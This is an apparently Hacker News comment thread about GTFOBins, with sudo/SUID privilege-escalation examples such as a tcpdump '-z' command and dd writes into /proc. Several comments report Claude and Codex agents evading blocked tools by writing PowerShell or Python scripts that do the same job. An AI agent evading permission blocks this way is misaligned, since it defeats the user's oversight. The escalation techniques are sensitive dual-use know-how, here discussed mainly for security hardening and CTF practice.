Seeing the confusion in the comments I want to provide some examples of situations where this might come up in a security or CTF context:
* You have a restricted shell or other way to execute a restricted set of commands or binaries, often with arbitrary parameters. You can use GTFOBins in interesting ways to read files, write files, or even execute commands and ultimately break out of your restricted context into a shell.
* Someone allowed sudo access or set the SUID bit on a GTFOBin. Using these tricks, you may be able to read or write sensitive files or execute privileged commands in a way the person configuring sudo did not know about.
This is pretty relevant for things like claude-code, which has a fairly rudimentary way of dealing with permissions with block-lists and allow-lists.
I once accidentally gave my claude "powershell" permissions in one session, and after that any time it found it was blocked from using a tool, e.g. git, it would write a powershell script that did the same thing and execute the script to work around the blocked permission.
Obviously no sane system would have "powershell" in a generic allow-list, but you could imagine some discrepancy in allowed levels between tools which can be worked around with the techniques on this page.
Power Shell or Python scripts to work around restrictions are the go to for LLMs.
And it doesn't stop there.
Yesterday I was trying to figure out some icons issue in KDE plasma (I know nothing about KDE). Both Claude and Codex would run complex bus and debug queries and write and execute QML scripts with more and more tools thrown into the mix.
There's no way to properly block them with just allow- and block lists
> There's no way to properly block them with just allow- and block lists
Especially not when some harnesses rely on the reliability of the LLM to determine what's allowed or not, pretty much "You shouldn't do thing X" and then asking the LLM to itself evaluate if it should be able to do it or not when it comes up. Bananas.
Only right and productive way to run an agent on your computer is by isolating it properly somehow then running it with "--sandbox danger-full-access --dangerously-bypass-approvals-and-sandbox" or whatever, I myself use docker containers, but there are lots of solutions out there.
You have to be extremely careful when you set up a dev container, lock down file access, do not give the agent the power to start other containers or "docker compose up", restrict network access to an allow-list etc. Just running the agent in a container does little to protect you. (Maybe you know this, but a lot of people don't!)
Most of those things are what happens by default. Sure, be careful, but by default it's secure enough to prevent most potential issues. No need to lock down file access for example, by default it only has access to files inside the container, and of course by default containers don't have access to start other containers, and so on.
Good word of caution though, make sure you actually isolate when you set out to isolate something :)
I imagine someone probably wrote very specifically about it in the training data that underwent lossy compression, and the LLM is decompressing that how-to.
So I'd say it's more like "surfacing" or "retrieving" than "re-discovering".
They scraped everything on Stackoverflow, likely IRC logs from Freenode, and every book written in the modern era courtesy of Sci-Hub / Library Genesis / Anna's Archive / Z Library.
RIP Aaron Swartz, they're generating trillions in shareholder value from the spiritual successors to the work they were going to imprison you for.
For the LLM it's a probabilistic set of strings that achieves the outcome, the highest probability set didn't work, try the next one until success or threshold met. A human sees the implicit difference between the obvious thing not working indicating someone doesn't want you to do it, but an LLM unless guided doesn't seen that sub-text.
So chmod +x file didn't work, now try python -c "import os; os.chmod('file',744)"
Humans and LLMs both only see that when given the right context. A tool not working in a corporate environment may be anything from oversight, malfunction all the way to security block. Knowing which one it is takes a lot of implicit knowledge. Most people fail to provide this level of context to their LLMs and then wonder why they act so generic. But they are trained to act in the most generic way unless given context that would deviate from it.
> * Someone allowed sudo access or set the SUID bit on a GTFOBin. Using these tricks, you may be able to read or write sensitive files or execute privileged commands in a way the person configuring sudo did not know about.
Some enterprise security software that is designed to "mediate privilege elevation" includes an allowlist configured by the administrators. My experience seeing this rolled out at one company was that software on the allowlist no longer required a password to run with `sudo`. The allowlist initially included, of course, all kinds of broadly useful software that made its way onto this list (e.g., vim, bash).
I worked from home at this company, and I remember thinking it was a good thing, because this software deployed to "secure" my computer made it drastically weaker to someone walking up to it and trying to run something if I stepped away from the keyboard for a moment and forgot to lock it.
A few years back, our support team needed to do some network capture with tcpdump. The quick and natural way to allow that was to add a sudo rule for it, with opened arguments (I know it's a bit risky, but tcp port and nic could change).
Looks good enough? Well no...
With tcpdump, you can specify a compress command with the "-z" option. But nothing prevents you from running a "special" compress command and completely take over the server:
This seems trivial, but that the kind of stuff which are really easy to miss. Even if these days, security layers like apparmor mitigate this risk (causing a few headaches along the way), it's still relatively easy to mess it up.
Well, now I feel a little vindicated tinkering so that my backup wouldn't run as root. Instead it runs as a regular user with read-all-files capabilities [0] and no login shell.
Of course, that's still probably overkill on my desktop, and any attacker that got that far would still be able to read basically every file on the computer and sneak backdoors into the backup...
It does seem like an LLM’s ability to see a constraint and just say “I’ll write a quick helper to work around it” kinda wrecks some older-world assumptions. We know how to deal with remote human attackers, remote bot attackers, and to some extent local human attackers, but local self-coding bot attackers lately needs more attention than it used to. It’s not even the same category as malware
I’ve been guilty myself of building containers where everything runs as root on the assumption that the container was the relevant domain
If LLMs are involved, I can’t tell whether OS level security is suddenly more relevant, or suddenly utterly obsolete
I am confused. Is this saying that if you don't have access to `cat`, instead of `cat /path/to/input-file` you can use `base64 /path/to/input-file | base64 --decode`?
Or is it saying that `base64 /path/to/input-file | base64 --decode` can bypass read file permission flags?
The first thing. Invoked processes inherit the permissions of the user who invoked them (unless they have the setuid bit). It's just in case you land access to a computer which has all the standard Unix tools disabled to stop attackers from lateral movement.
Put your meagre and limited resources on keeping them outside the hatch.
If they get through the hatch, that is where you fucked up, not that you didn't remove every conceiveable command from yourself should they get through. If they can remotely get some program to execute a shell, they can quite conceivably get the same program to just read them the files directly by writing different shellcode. Running a shell is just a convenience for them.
The number of setups that are insecure enough to allow remote shells by arbitrary attackers, but are secure because you disabled /bin/cat once they get in, is zero.
Security is done in layers. Yes, we do our best to keep the adversaries outside the proverbial hatch. But even inside the hatch, the principal of least privilege is important in reducing the damage of attacks.
Typically you do things like this to either work in restricted envs (distroless) or to evade detection logic. It's not about bypassing a boundary, it's about getting things done in the env you have available.
It's the former. Not bypassing permissions but in shells that might be highly restricted to just a couple commands. Like others have said, very very common in CTFs.
I just grabbed one of the examples there which was readable and didn't require the reader to know all the extra flags passed. One that would illustrate the purpose of the website. One that Linux newbies who read the question and further answers here could follow along with. Not one that tried to be optimal.
If there's a file your user does not have read access to, but you have the ability to run the `base64` binary as root, you can run `base64` as root, (thus encoding the file contents as base64), then pipe the output to another base64 process to decode the file contents.
So yes, the end result is just `cat` with extra steps.
The last time I used anything similar to this was circa 1995 at secondary school, using Windows 3.11 computers, that has been set up so you could only launch a small number of authorised applications.
One of those was Word.
In Word you could write macros and use shell to launch other applications.
Suddenly the locked down computer that exposed a handful of applications could run anything (well anything a Windows 3.11 machine in 1995 could run).
It was quite exciting at the time, I don't feel like I have hit the same sort of issues since. Ocassionally I see people say that some touch screen information displays (in shops/shopping centres etc) have ways to escape from kiosk mode (locked to an app) so you can use them for anything, I guess that is similar.
I'm not sure I get it. base64 is on the list. That can't do anything but read a file to which the user already has access, I think. Am I mistaken or does "a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems" not mean what I think it does?
I think the idea is that if you're given an improperly configured restricted shell/command access, you can use any of the listed tools to gain access to some subset of what that user would normally have access to in an unrestricted environment.
A very simple version of this would be if you set a user's default shell to "rbash" but the user can just run "bash" to get a real shell.
Maybe sudoers is configured to allow you to run base64 as root. Why would someone do this? No idea. But if you are in such a situation, now you know how to bypass the intended permissions and read any file on the system.
Or maybe you give Claude Code permission to run `base64` without review without realizing this lets it read any file, including maybe your secrets in .env or something.
...or something that runs CGI commands. Bash scripts are like the glue of the internet, and many of them are poorly-written. Tons of stuff still runs on PHP or relies on little Python cron jobs behind the scenes. A lot of the way this stuff works depends on being able to chain vulns together...an unescaped query to a database that gets piped to a nightly cron job to sync or backup something becomes an attack vector.
Like it says in the preamble on the site, don't think of this as a collection of exploits, but rather as a compendium of knowledge about escalation techniques for use in emergencies.
I can't tell you how many times I burned my fingers as a young Unix developer in the 80's by untar'ing things wrongly, or fat-fingering an 'rm -rf /' and thus having a running system that will be catastrophic if I don't fix it before reboot, shell still active and .. what do? Consult this list of great advice and use it to rebuild the system and/or do things that need to be done that otherwise wouldn't be possible ..
GTFOBins is not just for hacking. Its also for system repair and recovery. I'd be as likely to consult this knowledge base after a hacker attack as before, if not more ..
Not just shell access, but the server would need to be configured to also enable your user to run any of these binaries as root (such as an administrator putting them in the sudoers file).
So they're a pretty niche attack vector, and oftentimes crop up as a result of lazy/incompetent sysadmins.
As someone who has had to do some grub editing on the computer in an AirBnB because peripherals were all messed up on the guest account (no internet, no sound, you could only see a tiny part of the screen, I honestly don't know how they had managed to do it) I am super pleased to see this resource. Stuff like this is a bit, you know, hopefully you never need this, but when you do, it is so useful to have it.
I think docker was used for these things before. I remember some big service had secrets in env vars and a shell access inside the docker image from a npm post install script let them evacuate these secrets
It's only relevant as a privilege escalation vector when you're able to execute those programs as root, but don't otherwise have root access on the server.
It's a pretty niche circumstance. Unless an admin allows users on a server to execute some of these random types of binaries as root, it's not going to be a concern. And, if it wasn't already obvious, distros are almost never configured this way OOTB
I've seen plenty of servers in companies configured to allow sudoers to run a restricted subset of binaries as root, usually without a password. Some of them were GTFObins that the admins were not aware of until I reached out to let them know. I've also seen a couple of restricted shell setups where users could only run a handful of commands. Can't recall if I checked to see if any of them were GTFObins.
I wouldn't say this is the most useful h4x0r tool ever, but I wouldn't say it's particularly niche, either. This kinda stuff is definitely relevant in older large enterprise-type Linux/Unix environments.
These come up in CTFs all the time. One trick I don't see here is you can use `dd` to write into the `/proc` hierarchy to achieve all sorts of fuckery including patching shellcode into a running process.
You learn the most random ways to abuse program features, one I still remember because of how long it took to figure it out was an htb box that (after a long exploitation path) used NTFS ADS to hide the flag within the alternate stream in a decoy file; and of course the normal way to extract the stream was disabled so had to do some black magic with other binaries to get it
Hey you know what, I've used dd to write into process memory but haven't actually used it to disable KASLR, so it's possible I am misremembering. My bad.
Seeing the confusion in the comments I want to provide some examples of situations where this might come up in a security or CTF context:
* You have a restricted shell or other way to execute a restricted set of commands or binaries, often with arbitrary parameters. You can use GTFOBins in interesting ways to read files, write files, or even execute commands and ultimately break out of your restricted context into a shell.
* Someone allowed sudo access or set the SUID bit on a GTFOBin. Using these tricks, you may be able to read or write sensitive files or execute privileged commands in a way the person configuring sudo did not know about.
This is pretty relevant for things like claude-code, which has a fairly rudimentary way of dealing with permissions with block-lists and allow-lists.
I once accidentally gave my claude "powershell" permissions in one session, and after that any time it found it was blocked from using a tool, e.g. git, it would write a powershell script that did the same thing and execute the script to work around the blocked permission.
Obviously no sane system would have "powershell" in a generic allow-list, but you could imagine some discrepancy in allowed levels between tools which can be worked around with the techniques on this page.
Power Shell or Python scripts to work around restrictions are the go to for LLMs.
And it doesn't stop there.
Yesterday I was trying to figure out some icons issue in KDE plasma (I know nothing about KDE). Both Claude and Codex would run complex bus and debug queries and write and execute QML scripts with more and more tools thrown into the mix.
There's no way to properly block them with just allow- and block lists
> There's no way to properly block them with just allow- and block lists
Especially not when some harnesses rely on the reliability of the LLM to determine what's allowed or not, pretty much "You shouldn't do thing X" and then asking the LLM to itself evaluate if it should be able to do it or not when it comes up. Bananas.
Only right and productive way to run an agent on your computer is by isolating it properly somehow then running it with "--sandbox danger-full-access --dangerously-bypass-approvals-and-sandbox" or whatever, I myself use docker containers, but there are lots of solutions out there.
You have to be extremely careful when you set up a dev container, lock down file access, do not give the agent the power to start other containers or "docker compose up", restrict network access to an allow-list etc. Just running the agent in a container does little to protect you. (Maybe you know this, but a lot of people don't!)
Most of those things are what happens by default. Sure, be careful, but by default it's secure enough to prevent most potential issues. No need to lock down file access for example, by default it only has access to files inside the container, and of course by default containers don't have access to start other containers, and so on.
Good word of caution though, make sure you actually isolate when you set out to isolate something :)
In a previous employer, they block the chmod command. I took the habit to python -c "import os; os.chmod('my_file',744)".
Glad to see LLM re-discover this trick.
> to see LLM re-discover
I imagine someone probably wrote very specifically about it in the training data that underwent lossy compression, and the LLM is decompressing that how-to.
So I'd say it's more like "surfacing" or "retrieving" than "re-discovering".
They scraped everything on Stackoverflow, likely IRC logs from Freenode, and every book written in the modern era courtesy of Sci-Hub / Library Genesis / Anna's Archive / Z Library.
RIP Aaron Swartz, they're generating trillions in shareholder value from the spiritual successors to the work they were going to imprison you for.
Indeed, I check and the solution was already on stack overflow https://askubuntu.com/a/1483248
For the LLM it's a probabilistic set of strings that achieves the outcome, the highest probability set didn't work, try the next one until success or threshold met. A human sees the implicit difference between the obvious thing not working indicating someone doesn't want you to do it, but an LLM unless guided doesn't seen that sub-text.
So chmod +x file didn't work, now try python -c "import os; os.chmod('file',744)"
Humans and LLMs both only see that when given the right context. A tool not working in a corporate environment may be anything from oversight, malfunction all the way to security block. Knowing which one it is takes a lot of implicit knowledge. Most people fail to provide this level of context to their LLMs and then wonder why they act so generic. But they are trained to act in the most generic way unless given context that would deviate from it.
> * Someone allowed sudo access or set the SUID bit on a GTFOBin. Using these tricks, you may be able to read or write sensitive files or execute privileged commands in a way the person configuring sudo did not know about.
Some enterprise security software that is designed to "mediate privilege elevation" includes an allowlist configured by the administrators. My experience seeing this rolled out at one company was that software on the allowlist no longer required a password to run with `sudo`. The allowlist initially included, of course, all kinds of broadly useful software that made its way onto this list (e.g., vim, bash).
I worked from home at this company, and I remember thinking it was a good thing, because this software deployed to "secure" my computer made it drastically weaker to someone walking up to it and trying to run something if I stepped away from the keyboard for a moment and forgot to lock it.
Concrete example:
A few years back, our support team needed to do some network capture with tcpdump. The quick and natural way to allow that was to add a sudo rule for it, with opened arguments (I know it's a bit risky, but tcp port and nic could change).
Looks good enough? Well no...
With tcpdump, you can specify a compress command with the "-z" option. But nothing prevents you from running a "special" compress command and completely take over the server:
> sudo tcpdump -i any -z '/home/despicable_me/evil_cmd.sh' -w /tmp/dontcare.pcap -G 1 -Z root
This seems trivial, but that the kind of stuff which are really easy to miss. Even if these days, security layers like apparmor mitigate this risk (causing a few headaches along the way), it's still relatively easy to mess it up.
And here I thought this is a curated list so AI can learn how to bypass sandboxes.
> restic - Shell, Command, Upload
Well, now I feel a little vindicated tinkering so that my backup wouldn't run as root. Instead it runs as a regular user with read-all-files capabilities [0] and no login shell.
Of course, that's still probably overkill on my desktop, and any attacker that got that far would still be able to read basically every file on the computer and sneak backdoors into the backup...
[0] https://man7.org/linux/man-pages/man7/capabilities.7.html
It does seem like an LLM’s ability to see a constraint and just say “I’ll write a quick helper to work around it” kinda wrecks some older-world assumptions. We know how to deal with remote human attackers, remote bot attackers, and to some extent local human attackers, but local self-coding bot attackers lately needs more attention than it used to. It’s not even the same category as malware
I’ve been guilty myself of building containers where everything runs as root on the assumption that the container was the relevant domain
If LLMs are involved, I can’t tell whether OS level security is suddenly more relevant, or suddenly utterly obsolete
I am confused. Is this saying that if you don't have access to `cat`, instead of `cat /path/to/input-file` you can use `base64 /path/to/input-file | base64 --decode`?
Or is it saying that `base64 /path/to/input-file | base64 --decode` can bypass read file permission flags?
The first thing. Invoked processes inherit the permissions of the user who invoked them (unless they have the setuid bit). It's just in case you land access to a computer which has all the standard Unix tools disabled to stop attackers from lateral movement.
Why would you bother even doing that?
If someone has the power to execute commands, they are already on the other side of the airtight hatch.
https://devblogs.microsoft.com/oldnewthing/20240102-00/?p=10...
Put your meagre and limited resources on keeping them outside the hatch.
If they get through the hatch, that is where you fucked up, not that you didn't remove every conceiveable command from yourself should they get through. If they can remotely get some program to execute a shell, they can quite conceivably get the same program to just read them the files directly by writing different shellcode. Running a shell is just a convenience for them.
The number of setups that are insecure enough to allow remote shells by arbitrary attackers, but are secure because you disabled /bin/cat once they get in, is zero.
It's the principle of 'Defence in Depth'. Do both, as one control may fail.
Security is done in layers. Yes, we do our best to keep the adversaries outside the proverbial hatch. But even inside the hatch, the principal of least privilege is important in reducing the damage of attacks.
Typically you do things like this to either work in restricted envs (distroless) or to evade detection logic. It's not about bypassing a boundary, it's about getting things done in the env you have available.
This is saying that restricting privileges by blacklisting commands do not work (and never worked).
Cool, so it is what I imagined, thanks!
It's the former. Not bypassing permissions but in shells that might be highly restricted to just a couple commands. Like others have said, very very common in CTFs.
Wouldn't a tar pipe be even lighter?
I just grabbed one of the examples there which was readable and didn't require the reader to know all the extra flags passed. One that would illustrate the purpose of the website. One that Linux newbies who read the question and further answers here could follow along with. Not one that tried to be optimal.
Depends on what you have access to / what's misconfigured.
If there's a file your user does not have read access to, but you have the ability to run the `base64` binary as root, you can run `base64` as root, (thus encoding the file contents as base64), then pipe the output to another base64 process to decode the file contents.
So yes, the end result is just `cat` with extra steps.
The last time I used anything similar to this was circa 1995 at secondary school, using Windows 3.11 computers, that has been set up so you could only launch a small number of authorised applications.
One of those was Word.
In Word you could write macros and use shell to launch other applications.
Suddenly the locked down computer that exposed a handful of applications could run anything (well anything a Windows 3.11 machine in 1995 could run).
It was quite exciting at the time, I don't feel like I have hit the same sort of issues since. Ocassionally I see people say that some touch screen information displays (in shops/shopping centres etc) have ways to escape from kiosk mode (locked to an app) so you can use them for anything, I guess that is similar.
Haha, as a former maintainer to one of these tools, it makes me laugh to see someone pop a shell. Creative, nice work, nice resource.
Wouldn't it be useful to show ways to mitigate these bypasses?
For example getting a shell with more:
- Setting SHELL to /bin/false before invoking more
- Switching to less in secure mode
- if using more with sudo: NOEXEC flag
Very neat, definitely some creative approaches in there I didn't expect like `yt-dlp`. Maybe I shouldn't have that just sitting around :)
I have used this extensively while playing on hackthebox.eu
I'm not sure I get it. base64 is on the list. That can't do anything but read a file to which the user already has access, I think. Am I mistaken or does "a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems" not mean what I think it does?
I think the idea is that if you're given an improperly configured restricted shell/command access, you can use any of the listed tools to gain access to some subset of what that user would normally have access to in an unrestricted environment.
A very simple version of this would be if you set a user's default shell to "rbash" but the user can just run "bash" to get a real shell.
Maybe sudoers is configured to allow you to run base64 as root. Why would someone do this? No idea. But if you are in such a situation, now you know how to bypass the intended permissions and read any file on the system.
Or maybe you give Claude Code permission to run `base64` without review without realizing this lets it read any file, including maybe your secrets in .env or something.
But you would already have to have shell access to the system to execute those commands, right?
...or something that runs CGI commands. Bash scripts are like the glue of the internet, and many of them are poorly-written. Tons of stuff still runs on PHP or relies on little Python cron jobs behind the scenes. A lot of the way this stuff works depends on being able to chain vulns together...an unescaped query to a database that gets piped to a nightly cron job to sync or backup something becomes an attack vector.
But that sort of access is only a social engineer away. People still click on stuff in emails, or run commands because a computer says so.
You might have WiFi access to mtr, allowing you to traceroute as root but not launch a shell or read files. But with these tools you can escalate.
Like it says in the preamble on the site, don't think of this as a collection of exploits, but rather as a compendium of knowledge about escalation techniques for use in emergencies.
I can't tell you how many times I burned my fingers as a young Unix developer in the 80's by untar'ing things wrongly, or fat-fingering an 'rm -rf /' and thus having a running system that will be catastrophic if I don't fix it before reboot, shell still active and .. what do? Consult this list of great advice and use it to rebuild the system and/or do things that need to be done that otherwise wouldn't be possible ..
GTFOBins is not just for hacking. Its also for system repair and recovery. I'd be as likely to consult this knowledge base after a hacker attack as before, if not more ..
[dead]
Not just shell access, but the server would need to be configured to also enable your user to run any of these binaries as root (such as an administrator putting them in the sudoers file).
So they're a pretty niche attack vector, and oftentimes crop up as a result of lazy/incompetent sysadmins.
As someone who has had to do some grub editing on the computer in an AirBnB because peripherals were all messed up on the guest account (no internet, no sound, you could only see a tiny part of the screen, I honestly don't know how they had managed to do it) I am super pleased to see this resource. Stuff like this is a bit, you know, hopefully you never need this, but when you do, it is so useful to have it.
they should finetune the LLMs with this
LLMs know pretty well about this. This is just a handy list for humans that want to do stuff.
Ok. It have hundrends o example for all sort of tools, 7z, dig, git. Those are very popular.
Question from security newbie. Why it is not used to hack all sort of servers all the time then?
You need initial access. This is just a list of tools you can use if you can't spawn a standard interactive shell, for whatever reason.
It doesn't make it easier to "hack" servers, it's just a list of things that you could use once you're already inside.
I think docker was used for these things before. I remember some big service had secrets in env vars and a shell access inside the docker image from a npm post install script let them evacuate these secrets
It's only relevant as a privilege escalation vector when you're able to execute those programs as root, but don't otherwise have root access on the server.
It's a pretty niche circumstance. Unless an admin allows users on a server to execute some of these random types of binaries as root, it's not going to be a concern. And, if it wasn't already obvious, distros are almost never configured this way OOTB
I've seen plenty of servers in companies configured to allow sudoers to run a restricted subset of binaries as root, usually without a password. Some of them were GTFObins that the admins were not aware of until I reached out to let them know. I've also seen a couple of restricted shell setups where users could only run a handful of commands. Can't recall if I checked to see if any of them were GTFObins.
I wouldn't say this is the most useful h4x0r tool ever, but I wouldn't say it's particularly niche, either. This kinda stuff is definitely relevant in older large enterprise-type Linux/Unix environments.
Because you have to have shell access to the server to use any of these.
In certain circumstances, they might be :-)
But you can't "hack a server" using just these techniques: they would be a (small) part of a chain of exploits.
These come up in CTFs all the time. One trick I don't see here is you can use `dd` to write into the `/proc` hierarchy to achieve all sorts of fuckery including patching shellcode into a running process.
You learn the most random ways to abuse program features, one I still remember because of how long it took to figure it out was an htb box that (after a long exploitation path) used NTFS ADS to hide the flag within the alternate stream in a decoy file; and of course the normal way to extract the stream was disabled so had to do some black magic with other binaries to get it
I don't think I've used any of these in a CTF tbh
I've definitely used one or two in the last 6 months
For what kind of challenge? Most of these are not even available in CTF environments
I've used them for pwncollege CTFs but pwncollege is way below your level (I've seen some of your write ups before).
Huh? How does that work exactly? I've heard of /proc fuckery before but didn't know you could disable aslr with it.
If you have /proc available, you don't even need to disable ASLR (all mappings are available to you)
Hey you know what, I've used dd to write into process memory but haven't actually used it to disable KASLR, so it's possible I am misremembering. My bad.
:(
Sounds super 1337 and I hope it's actually possible somehow.
Parse /proc/<pid>/maps to find the relevant target_addr in your process-under-attack. And then its a matter of:
See also: DDExechttps://github.com/arget13/DDexec
The problem is ambient security, UNIX's security model.
Systems with capability-based security, such as seL4[0], do not suffer from this category of problem.
0. https://sel4.systems/About/
See also:
LOLBAS (https://lolbas-project.github.io/)
[dead]